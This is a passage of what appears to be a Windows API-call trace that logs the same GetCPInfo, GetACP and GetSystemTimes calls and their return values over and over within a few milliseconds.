lpCPInfo=0x18fa7c) returned 1 [0081.234] GetACP () returned 0x4e4 [0081.234] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.234] GetACP () returned 0x4e4 [0081.234] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.235] GetACP () returned 0x4e4 [0081.235] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.236] GetACP () returned 0x4e4 [0081.236] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.237] GetACP () returned 0x4e4 [0081.237] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.237] GetACP () returned 0x4e4 [0081.237] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.237] GetACP () returned 0x4e4 [0081.237] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.237] GetACP () returned 0x4e4 [0081.237] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.237] GetACP () returned 0x4e4 [0081.237] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.238] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.238] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.239] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.239] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.240] GetACP () returned 0x4e4 [0081.240] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.241] GetACP () returned 0x4e4 [0081.241] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.242] GetACP () returned 0x4e4 [0081.242] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.243] GetACP () returned 0x4e4 [0081.243] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.243] GetACP () returned 0x4e4 [0081.243] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.243] GetACP () returned 0x4e4 [0081.243] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.243] GetACP () returned 0x4e4 [0081.243] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.243] GetACP () returned 0x4e4 [0081.243] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.243] GetACP () returned 0x4e4 [0081.243] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.244] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.244] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.244] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.244] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.244] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.244] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.244] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.244] GetACP () returned 0x4e4 [0081.245] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.245] GetACP () returned 0x4e4 [0081.245] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.245] GetACP () returned 0x4e4 [0081.245] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.245] GetACP () returned 0x4e4 [0081.245] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.245] GetACP () returned 0x4e4 [0081.245] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.245] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.245] GetACP () returned 0x4e4 [0081.245] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] GetACP () returned 0x4e4 [0081.246] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.246] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.246] 